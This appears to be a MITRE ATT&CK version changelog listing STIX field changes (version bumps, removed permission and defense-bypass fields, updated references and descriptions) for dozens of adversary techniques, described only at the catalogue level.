x_mitre_platforms[3] | Network | Network Devices |
[T1505.002] Server Software Component: Transport Agent
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['SYSTEM', 'Administrator', 'root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 17:05:44.321000+00:00 | 2025-04-15 19:58:21.139000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1546.005] Event Triggered Execution: Trap
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-24 16:43:02.273000+00:00 | 2025-04-15 19:58:36.056000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1484.002] Domain or Tenant Policy Modification: Trust Modification
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 13:50:11.593000+00:00 | 2025-04-15 19:58:14.422000+00:00 |
external_references[8]['description'] | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021. | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024. |
external_references[8]['url'] | https://www.sygnia.co/golden-saml-advisory | https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/ |
x_mitre_version | 2.1 | 2.2 |
[T1127] Trusted Developer Utilities Proxy Execution
Current version: 1.3
Version changed from: 1.2 → 1.3
t | Adversaries may take advantage of trusted developer utilitie | t | Adversaries may take advantage of trusted developer utilitie |
| s to proxy execution of malicious payloads. There are many u | | s to proxy execution of malicious payloads. There are many u |
| tilities used for software development related tasks that ca | | tilities used for software development related tasks that ca |
| n be used to execute code in various forms to assist in deve | | n be used to execute code in various forms to assist in deve |
| lopment, debugging, and reverse engineering.(Citation: engim | | lopment, debugging, and reverse engineering.(Citation: engim |
| a0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: | | a0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: |
| Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utili | | Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utili |
| ties may often be signed with legitimate certificates that a | | ties may often be signed with legitimate certificates that a |
| llow them to execute on a system and proxy execution of mali | | llow them to execute on a system and proxy execution of mali |
| cious code through a trusted process that effectively bypass | | cious code through a trusted process that effectively bypass |
| es application control solutions. | | es application control solutions. Smart App Control is a fe |
| | | ature of Windows that blocks applications it considers poten |
| | | tially malicious from running by verifying unsigned applicat |
| | | ions against a known safe list from a Microsoft cloud servic |
| | | e before executing them.(Citation: Microsoft Smart App Contr |
| | | ol) However, adversaries may leverage "reputation hijacking" |
| | | to abuse an operating system’s trust of safe, signed applic |
| | | ations that support the execution of arbitrary code. By leve |
| | | raging [Trusted Developer Utilities Proxy Execution](https:/ |
| | | /attack.mitre.org/techniques/T1127) to run their malicious c |
| | | ode, adversaries may bypass Smart App Control protections.(C |
| | | itation: Elastic Security Labs) |
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-05-05 05:00:37.443000+00:00 | 2025-04-15 19:59:24.863000+00:00 |
description | Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions. | Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
Smart App Control is a feature of Windows that blocks applications it considers potentially malicious from running by verifying unsigned applications against a known safe list from a Microsoft cloud service before executing them.(Citation: Microsoft Smart App Control) However, adversaries may leverage "reputation hijacking" to abuse an operating system’s trust of safe, signed applications that support the execution of arbitrary code. By leveraging [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127) to run their malicious code, adversaries may bypass Smart App Control protections.(Citation: Elastic Security Labs) |
external_references[1]['description'] | Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017. | Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved November 17, 2024. |
external_references[1]['url'] | http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html | https://web.archive.org/web/20160816135945/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Elastic Security Labs', 'description': 'Joe Desimone. (2024, August 5). Dismantling Smart App Control. Retrieved March 21, 2025.', 'url': 'https://www.elastic.co/security-labs/dismantling-smart-app-control'} |
external_references | | {'source_name': 'Microsoft Smart App Control', 'description': 'Microsoft. (n.d.). Smart App Control Frequently Asked Questions. Retrieved April 4, 2025.', 'url': 'https://support.microsoft.com/en-us/windows/smart-app-control-frequently-asked-questions-285ea03d-fa88-4d56-882e-6698afdb7003'} |
[T1059.004] Command and Scripting Interpreter: Unix Shell
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:17:19.136000+00:00 | 2025-04-15 19:58:56.647000+00:00 |
description | Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. | Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
Some systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell. |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Network Devices |
x_mitre_platforms | | ESXi |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1546.004] Event Triggered Execution: Unix Shell Configuration Modification
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 15:02:24.143000+00:00 | 2025-04-15 19:59:00.346000+00:00 |
x_mitre_version | 2.1 | 2.2 |
[T1552] Unsecured Credentials
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:26.362000+00:00 |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[6] | Network | Network Devices |
[T1550] Use Alternate Authentication Material
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['System Access Controls'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:09:19.001000+00:00 | 2025-04-15 19:58:30.693000+00:00 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Linux |
[T1497.002] Virtualization/Sandbox Evasion: User Activity Based Checks
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Static File Analysis', 'Signature-based detection', 'Host forensic analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:50:18.050000+00:00 | 2025-04-15 19:58:51.123000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1204] User Execution
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-11-11 18:52:12.103000+00:00 | 2025-04-15 19:58:49.690000+00:00 |
description | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
Adversaries may also deceive users into performing actions such as:
* Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery) | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
Adversaries may also deceive users into performing actions such as:
* Enabling [Remote Access Tools](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Tools](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery) |
x_mitre_version | 1.7 | 1.8 |
[T1564.007] Hide Artifacts: VBA Stomping
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
x_mitre_system_requirements | ['MS Office version specified in _VBA_PROJECT stream must match host'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 14:02:07.944000+00:00 | 2025-04-15 19:59:06.926000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1055.014] Process Injection: VDSO Hijacking
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-07 17:09:09.048000+00:00 | 2025-04-15 19:58:52.691000+00:00 |
external_references[1]['description'] | backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020. | backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved November 17, 2024. |
external_references[1]['url'] | https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ | https://web.archive.org/web/20210205211142/https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1021.005] Remote Services: VNC
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['VNC server installed and listening for connections.'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:20:07.264000+00:00 | 2025-04-15 19:58:01.548000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1078] Valid Accounts
Current version: 2.8
Version changed from: 2.7 → 2.8
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Firewall', 'Anti-virus', 'Host Intrusion Prevention Systems', 'Network Intrusion Detection System', 'Application Control', 'System Access Controls'] | |
x_mitre_effective_permissions | ['User', 'Administrator'] | |
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:09:46.024000+00:00 | 2025-04-15 19:58:58.373000+00:00 |
x_mitre_version | 2.7 | 2.8 |
x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1218.012] System Binary Proxy Execution: Verclsid
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Digital Certificate Validation'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-05-20 17:35:28.221000+00:00 | 2025-04-15 19:58:46.323000+00:00 |
external_references[5]['description'] | verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020. | verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved November 17, 2024. |
external_references[5]['url'] | https://www.winosbite.com/verclsid-exe/ | https://winosbite.com/verclsid-exe/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
[T1125] Video Capture
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:37.205000+00:00 | 2025-04-16 20:37:17.864000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1497] Virtualization/Sandbox Evasion
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Host forensic analysis', 'Signature-based detection', 'Static File Analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:50:18.049000+00:00 | 2025-04-15 19:58:47.123000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1059.005] Command and Scripting Interpreter: Visual Basic
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:43:27.104000+00:00 | 2025-04-15 19:59:14.314000+00:00 |
x_mitre_version | 1.4 | 1.5 |
[T1600] Weaken Encryption
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Encryption'] | |
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-21 22:37:49.258000+00:00 | 2025-04-15 19:58:12.571000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1056.003] Input Capture: Web Portal Capture
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['An externally facing login portal is configured.'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:43:43.849000+00:00 | 2025-04-15 19:58:38.649000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1071.001] Application Layer Protocol: Web Protocols
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:28:21.234000+00:00 | 2025-04-15 19:59:14.227000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1102] Web Service
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-07 17:53:54.380000+00:00 | 2025-04-15 19:58:47.211000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1583.006] Acquire Infrastructure: Web Services
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-16 22:47:59.395000+00:00 | 2025-04-15 19:58:49.217000+00:00 |
description | Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them. | Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google, GitHub, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29)(Citation: Hacker News GitHub Abuse 2024) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them. |
external_references[1]['description'] | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf | https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Hacker News GitHub Abuse 2024', 'description': "Dvir Sasson. (2024, May 13). GitHub Abuse Flaw Shows Why We Can't Shrug Off Abuse Vulnerabilities in Security. Retrieved March 31, 2025.", 'url': 'https://thehackernews.com/expert-insights/2024/05/github-abuse-flaw-shows-why-we-cant.html'} |
x_mitre_contributors | | Dvir Sasson, Reco |
[T1550.004] Use Alternate Authentication Material: Web Session Cookie
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['System Access Controls'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:11:15.657000+00:00 | 2025-04-15 19:59:05.730000+00:00 |
x_mitre_version | 1.4 | 1.5 |
[T1505.003] Server Software Component: Web Shell
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:45:06.434000+00:00 | 2025-04-15 19:58:34.688000+00:00 |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[3] | Network | Network Devices |
[T1059.003] Command and Scripting Interpreter: Windows Command Shell
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:19:56.540000+00:00 | 2025-04-15 19:59:10.209000+00:00 |
x_mitre_version | 1.4 | 1.5 |
[T1047] Windows Management Instrumentation
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:20:57.328000+00:00 | 2025-04-15 19:58:01.648000+00:00 |
x_mitre_version | 1.5 | 1.6 |
[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-13 14:08:20.882000+00:00 | 2025-04-15 19:58:50.950000+00:00 |
external_references[3]['description'] | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. | Devon Kerr. (2015). There's Something About WMI. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf | https://web.archive.org/web/20221203203722/https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf |
external_references[6]['description'] | Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016. | Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved November 17, 2024. |
external_references[6]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf | https://web.archive.org/web/20160629094859/https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf |
x_mitre_version | 1.4 | 1.5 |
[T1543.003] Create or Modify System Process: Windows Service
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_removed
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_effective_permissions | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-04-11 19:25:51.394000+00:00 | 2025-04-15 19:58:16.076000+00:00 |
x_mitre_version | 1.5 | 1.6 |
[T1547.004] Boot or Logon Autostart Execution: Winlogon Helper DLL
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_permissions_required | ['SYSTEM', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-02-14 21:24:37.780000+00:00 | 2025-04-15 19:58:37.982000+00:00 |
external_references[1]['description'] | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved November 17, 2024. |
external_references[1]['url'] | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | https://web.archive.org/web/20160214140250/http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order |
x_mitre_version | 1.2 | 1.3 |
[T1547.013] Boot or Logon Autostart Execution: XDG Autostart Entries
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_permissions_required | ['User', 'root'] | |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-10-16 16:35:12.501000+00:00 | 2025-04-15 19:59:14.885000+00:00 |
external_references[2]['description'] | Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved September 12, 2019. | Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved November 17, 2024. |
external_references[2]['url'] | https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html | https://specifications.freedesktop.org/desktop-entry-spec/latest/recognized-keys.html |
x_mitre_version | 1.1 | 1.2 |
[T1559.003] Inter-Process Communication: XPC Services
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-16 16:14:12.793000+00:00 | 2025-04-15 19:58:47.031000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1220] XSL Script Processing
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_defense_bypassed | ['Anti-virus', 'Digital Certificate Validation', 'Application Control'] | |
x_mitre_system_requirements | ['Microsoft Core XML Services (MSXML) or access to wmic.exe'] | |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-09-12 19:40:12.337000+00:00 | 2025-04-15 19:59:19.125000+00:00 |
x_mitre_version | 1.2 | 1.3 |
Patches
[T1557.002] Adversary-in-the-Middle: ARP Cache Poisoning
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-07-22 18:37:22.176000+00:00 | 2025-04-15 21:43:10.406000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1650] Acquire Access
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2023-04-14 20:04:42.893000+00:00 | 2025-04-15 21:43:51.840000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1583] Acquire Infrastructure
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-16 20:03:59.884000+00:00 | 2025-04-15 21:44:09.753000+00:00 |
external_references[7]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
external_references[7]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1595] Active Scanning
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
--- | --- | --- |
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2022-03-08 20:58:13.661000+00:00 | 2025-04-15 21:44:26.959000+00:00 |
[T1137.006] Office Application Startup: Add-ins
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
--- | --- | --- |
modified | 2024-10-15 15:37:09.190000+00:00 | 2025-04-15 21:45:27.400000+00:00 |
